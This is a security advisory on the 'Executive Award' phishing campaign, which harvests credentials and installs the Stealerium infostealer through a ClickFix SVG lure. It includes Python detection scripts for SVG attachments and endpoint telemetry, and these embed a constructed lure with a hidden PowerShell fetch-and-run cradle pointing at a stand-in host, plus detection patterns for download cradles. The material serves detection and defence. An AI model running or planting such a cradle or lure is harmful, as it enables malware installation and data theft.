Executive Award Phishing Scam Deploys Stealerium Malware via ClickFix

A phishing campaign dubbed the Executive Award scam is targeting organizations with a two-stage attack that pairs social engineering with malware delivery. It first lures victims into entering their login credentials on a counterfeit HTML form, then installs the Stealerium information stealer on the compromised system.

Stage One: Credential Harvesting

The attack begins with an HTML phishing page named Virtual-Gift-Card-Claim.html that masquerades as a corporate award notification. Believing they must verify their account to claim an executive award, the victim enters their login credentials into the form. The form submits that data straight to a Telegram endpoint the attackers use as a command-and-control channel rather than to any corporate login service; the mismatch between the page's branding and the form's real submit destination is the tell a reviewer should look for. This credential-harvesting phase is the first stage of the infection chain.

Stage Two: Malware Deployment via ClickFix Lure

With the credentials in hand, the attackers move to the second stage by delivering a malicious SVG file named account-verification-form.svg. The file carries a PowerShell payload wrapped in a ClickFix lure. Despite the name, ClickFix is not a software exploit: it is a social-engineering technique in which the victim is shown a bogus verification or "fix" step and instructed to paste a command (typically placed on their clipboard by the page's script) into the Windows Run dialog or a PowerShell window and press Enter. Because the victim launches the command themselves, no vulnerability is needed. The PowerShell code then downloads and installs the Stealerium infostealer on the victim's computer.

Understanding the Infection Mechanism

What makes the attack effective is that it relies on legitimate Windows components and the victim's cooperation rather than on any exploit. The SVG is rendered by the browser, which displays the ClickFix instructions; the PowerShell command the victim then pastes runs under their own account through the standard interpreter, so the process tree looks like any user-initiated command (typically explorer.exe starting powershell.exe) and does not by itself trigger a malicious-file alert. From there, the script fetches the Stealerium components, including the main DLL, batch scripts, and command executables, and establishes persistence so the stealer survives reboots and keeps exfiltrating data.
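A script-bearing SVG of the kind described above can be triaged statically, without ever rendering it in a browser. The Python below is an added example written for this page, not code from the original article or from any vendor's tooling; the function names are my own, both SVG documents in it are constructed for illustration (the lure's download URL uses the reserved .invalid domain and fetches nothing), and nothing about the real account-verification-form.svg is assumed beyond the article's statement that it carries a PowerShell payload.

```python
"""Static triage of an SVG attachment for active content (added example; samples are constructed)."""
import base64
import re
import xml.etree.ElementTree as ET  # for untrusted real samples prefer defusedxml (entity expansion)

EVENT_ATTR = re.compile(r"^on[a-z]+$", re.I)           # onload=, onclick=, onerror= ...
SUSPICIOUS_TEXT = re.compile(
    r"powershell|pwsh|invoke-expression|\biex\b|clipboard|-enc\b|"
    r"-w(?:indowstyle)?\s+hidden|cmd(?:\.exe)?\s*/c|win\s*\+\s*r",
    re.I,
)
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{60,}={0,2}")      # long base64 runs that may hide a command


def _local(name: str) -> str:
    """Strip an XML namespace: '{http://www.w3.org/2000/svg}script' -> 'script'."""
    return name.rsplit("}", 1)[-1]


def decode_suspicious_b64(text: str) -> list:
    """Decode long base64 runs and keep the ones that decode to a shell or PowerShell command.
    PowerShell -EncodedCommand payloads are UTF-16LE, so that encoding is tried before UTF-8."""
    hits = []
    for m in B64_BLOB.finditer(text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:            # binascii.Error is a ValueError: not real base64
            continue
        for enc in ("utf-16-le", "utf-8"):
            try:
                decoded = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if SUSPICIOUS_TEXT.search(decoded):
                hits.append(decoded)
                break
    return hits


def triage_svg(svg_text: str) -> dict:
    """Return a verdict plus every active-content indicator found in the SVG."""
    findings = []
    for el in ET.fromstring(svg_text).iter():
        tag = _local(el.tag)
        if tag in ("script", "foreignObject"):            # script, or HTML smuggled via foreignObject
            findings.append(f"<{tag}> element present")
        for attr, val in el.attrib.items():
            name = _local(attr)                            # handles both href and xlink:href
            if EVENT_ATTR.match(name):
                findings.append(f"event handler {name}= on <{tag}>")
            elif name == "href" and val.strip().lower().startswith(("javascript:", "data:")):
                findings.append(f"active href on <{tag}>: {val.strip()[:40]}")
    keywords = sorted({m.group(0).lower() for m in SUSPICIOUS_TEXT.finditer(svg_text)})
    if keywords:
        findings.append("plaintext indicators: " + ", ".join(keywords))
    for cmd in decode_suspicious_b64(svg_text):
        findings.append("base64 blob decodes to: " + cmd)
    return {"verdict": "suspicious" if findings else "clean", "findings": findings}


# Constructed lure: the script copies a hidden PowerShell one-liner to the clipboard and
# tells the victim to paste it into the Run dialog (the ClickFix pattern). Inert host.
LURE_CMD = 'powershell -w hidden -c "iex (irm http://example.invalid/stage2)"'
LURE_SVG = """<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <rect width="400" height="200" fill="#eee" onload="run()"/>
  <text x="20" y="40">Account verification form</text>
  <a xlink:href="javascript:run()"><text x="20" y="80">Verify now</text></a>
  <script><![CDATA[
    function run() {
      navigator.clipboard.writeText(atob("__B64__"));
      alert("Press Win+R, then Ctrl+V and Enter to verify your account");
    }
  ]]></script>
</svg>""".replace("__B64__", base64.b64encode(LURE_CMD.encode()).decode())

# Constructed benign file for comparison: static shapes and text only.
CLEAN_SVG = '<svg xmlns="http://www.w3.org/2000/svg"><rect width="10" height="10"/><text>Award</text></svg>'

if __name__ == "__main__":
    for name, doc in (("lure", LURE_SVG), ("clean", CLEAN_SVG)):
        result = triage_svg(doc)
        print(name, result["verdict"])
        for finding in result["findings"]:
            print("  -", finding)
```

The structural checks (script elements, on* handlers, javascript: links) catch what a browser would execute, while the base64 pass recovers the command the lure hides from a casual read; a mail gateway that strips or quarantines SVGs with any of these findings loses nothing of value, since legitimate award graphics contain none of them.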

Stealerium Malware: A Persistent Threat

Stealerium is an open-source .NET information stealer whose source code is publicly available, which is part of why it keeps surfacing in commodity campaigns. It runs silently and harvests sensitive data such as saved browser credentials from the infected host. In this campaign it reports to a command-and-control server at 31.57.147.77:6464 and pulls additional components and commands from several download endpoints. That modular design lets the operators change what runs on a victim after infection without having to re-deliver the initial payload.

Recommendations for Organizations

To mitigate the risks associated with this campaign, organizations should implement the following measures:

– Monitor for Unusual PowerShell Activity: Enable PowerShell script block logging (Event ID 4104) and process-creation auditing (Event ID 4688 or Sysmon Event ID 1), and alert on powershell.exe or cmd.exe spawned by explorer.exe with a hidden window (-w hidden), an encoded command (-enc), or a download cradle (IEX, Invoke-WebRequest, DownloadString). A shell launched from the Run dialog with those traits is the ClickFix signature. The commands a user has entered in Win+R are also recorded under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU and are worth collecting during triage.

– Inspect SVG Attachments: SVG is XML and can carry <script> elements, event-handler attributes such as onload, and javascript: links that a browser will run as soon as the file is opened. Treat SVG attachments like HTML: block or sandbox them at the mail gateway, and examine any that must be reviewed in a text editor rather than a browser.

– Network Monitoring: Block the command-and-control address 31.57.147.77 on TCP port 6464 at the perimeter and alert on any outbound connection to it in firewall, proxy, or endpoint network logs. Because this indicator is a raw IP address, it will not show up in DNS telemetry; keep watching DNS for any domains later tied to the campaign, but do not rely on DNS to catch this address.

– User Education: Tell employees that no legitimate IT process or award program will ask them to copy a command and paste it into the Run dialog or a terminal, and that unsolicited emails claiming executive recognition remain an effective social engineering vector.
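One way to turn the PowerShell and network recommendations above into something that runs: the Python below is an added example, not code from the article or from any vendor product, that applies those checks to constructed endpoint telemetry shaped like Sysmon process-creation (ID 1) and network-connection (ID 3) records. Only the C2 address 31.57.147.77:6464 comes from the article; every path, command line, and other IP address is made up, the event field names (event_id, image, parent, cmd, dest_ip, dest_port) are a simplified schema rather than Sysmon's real field names, the RunMRU dictionary is a hypothetical registry export, and the function names are my own.

```python
"""Triage of endpoint telemetry for ClickFix-style PowerShell launches and the campaign's
network indicator (added example; all events below are constructed)."""
import base64
import re

C2_IOCS = {("31.57.147.77", 6464)}  # (ip, port) pairs published for this campaign

SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")
# Parents that mean a person (or a lure page in their browser) launched the shell:
# explorer.exe hosts the Win+R Run dialog, which is where ClickFix tells victims to paste.
USER_PARENTS = ("explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe")
CRADLE = re.compile(
    r"\biex\b|invoke-expression|downloadstring|downloadfile|\birm\b|invoke-restmethod|"
    r"\biwr\b|invoke-webrequest|\bcurl\b|bitsadmin|certutil.*-urlcache|start-bitstransfer",
    re.I,
)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)
ENCODED = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """-EncodedCommand payloads are base64 over UTF-16LE; return the plaintext or None."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_process(ev: dict) -> list:
    """Reasons an analyst should look at a process-creation event, or [] if it looks benign."""
    image, parent, cmd = basename(ev["image"]), basename(ev.get("parent", "")), ev.get("cmd", "")
    if image not in SHELLS:
        return []
    reasons = []
    if parent in USER_PARENTS:
        reasons.append(f"{image} started by user-facing {parent} (Run dialog or browser)")
    if HIDDEN.search(cmd):
        reasons.append("hidden window requested")
    decoded = decode_encoded_command(cmd)
    if decoded:
        reasons.append(f"encoded command decodes to: {decoded}")
    cradle = CRADLE.search(decoded or "") or CRADLE.search(cmd)
    if cradle:
        reasons.append(f"download cradle: {cradle.group(0)}")
    # Flag a shell from the Run dialog or a browser that shows any stealth or download trait,
    # and a hidden-window download cradle wherever it comes from; plain admin scripting passes.
    if (parent in USER_PARENTS and len(reasons) > 1) or (HIDDEN.search(cmd) and cradle):
        return reasons
    return []


def triage(events: list) -> dict:
    """Map event index -> reasons for every event worth attention."""
    hits = {}
    for i, ev in enumerate(events):
        if ev["event_id"] == 1:
            reasons = triage_process(ev)
        elif ev["event_id"] == 3 and (ev["dest_ip"], ev["dest_port"]) in C2_IOCS:
            reasons = [f"connection to known C2 {ev['dest_ip']}:{ev['dest_port']}"]
        else:
            reasons = []
        if reasons:
            hits[i] = reasons
    return hits


def runmru_commands(values: dict) -> list:
    """Commands typed into Win+R, newest first, from an export of
    HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU.
    Each entry is stored as 'command\\1'; the MRUList value lists the entry letters in order."""
    return [values[k].removesuffix("\\1") for k in values.get("MRUList", "") if k in values]


def suspicious_runmru(values: dict) -> list:
    """Run-dialog history entries that look like a pasted ClickFix command."""
    return [c for c in runmru_commands(values) if CRADLE.search(c) or HIDDEN.search(c)]


# Constructed telemetry: event_id 1 = process creation, 3 = network connection.
ENC = base64.b64encode("iex (irm http://example.invalid/s)".encode("utf-16-le")).decode()
EVENTS = [
    {"event_id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell -w hidden -c "iex (irm http://example.invalid/stage2)"'},
    {"event_id": 1, "parent": r"C:\Program Files\Monitoring\agent.exe",   # benign scheduled admin script
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'powershell.exe -NoProfile -File "C:\Program Files\Monitoring\inventory.ps1"'},
    {"event_id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd /c powershell -enc " + ENC},
    {"event_id": 3, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "dest_ip": "31.57.147.77", "dest_port": 6464},
    {"event_id": 3, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dest_ip": "203.0.113.10", "dest_port": 443},                          # TEST-NET-3, benign
]
RUNMRU_SAMPLE = {"MRUList": "ba", "a": "notepad\\1",
                 "b": 'powershell -w hidden -c "iex (irm http://example.invalid/stage2)"\\1'}

if __name__ == "__main__":
    for i, reasons in triage(EVENTS).items():
        print(f"event {i}:", "; ".join(reasons))
    print("suspicious Run dialog history:", suspicious_runmru(RUNMRU_SAMPLE))
```

The parent-process condition is what keeps this from paging on every administrator's -NoProfile script: a shell started by explorer.exe or a browser with a hidden window, an encoded command, or a download cradle is the victim doing the attacker's typing, while the same flags under a management agent are routine. The network rule matches on the IP and port directly because, as noted above, a raw-IP C2 never produces a DNS query to alert on.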

By staying vigilant and implementing robust security measures, organizations can protect themselves against sophisticated phishing campaigns like the Executive Award scam.